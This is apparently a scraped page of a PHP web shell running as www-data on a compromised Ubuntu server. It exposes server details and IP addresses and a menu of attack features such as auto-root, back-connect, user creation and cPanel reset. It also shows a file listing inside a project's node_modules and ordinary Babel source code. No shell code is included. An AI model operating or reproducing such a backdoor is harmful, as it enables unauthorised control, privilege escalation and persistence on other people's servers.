Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
@babel /
core /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
dr-xr-xr-x
errors
[ DIR ]
dr-xr-xr-x
gensync-utils
[ DIR ]
dr-xr-xr-x
parser
[ DIR ]
dr-xr-xr-x
tools
[ DIR ]
dr-xr-xr-x
transformation
[ DIR ]
dr-xr-xr-x
vendor
[ DIR ]
dr-xr-xr-x
index.js
5.78
KB
-rw-rw-rw-
index.js.map
6.06
KB
-rw-rw-rw-
parse.js
1.4
KB
-rw-rw-rw-
parse.js.map
3.68
KB
-rw-rw-rw-
transform-ast.js
1.64
KB
-rw-rw-rw-
transform-ast.js.map
4.37
KB
-rw-rw-rw-
transform-file-browser.js
733
B
-rw-rw-rw-
transform-file-browser.js.map
1.49
KB
-rw-rw-rw-
transform-file.js
1.08
KB
-rw-rw-rw-
transform-file.js.map
3.1
KB
-rw-rw-rw-
transform.js
1.47
KB
-rw-rw-rw-
transform.js.map
3.91
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : transform-file.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.transformFile = transformFile; exports.transformFileAsync = transformFileAsync; exports.transformFileSync = transformFileSync; function _gensync() { const data = require("gensync"); _gensync = function () { return data; }; return data; } var _index = require("./config/index.js"); var _index2 = require("./transformation/index.js"); var fs = require("./gensync-utils/fs.js"); ({}); const transformFileRunner = _gensync()(function* (filename, opts) { const options = Object.assign({}, opts, { filename }); const config = yield* (0, _index.default)(options); if (config === null) return null; const code = yield* fs.readFile(filename, "utf8"); return yield* (0, _index2.run)(config, code); }); function transformFile(...args) { transformFileRunner.errback(...args); } function transformFileSync(...args) { return transformFileRunner.sync(...args); } function transformFileAsync(...args) { return transformFileRunner.async(...args); } 0 && 0; //# sourceMappingURL=transform-file.js.map
Close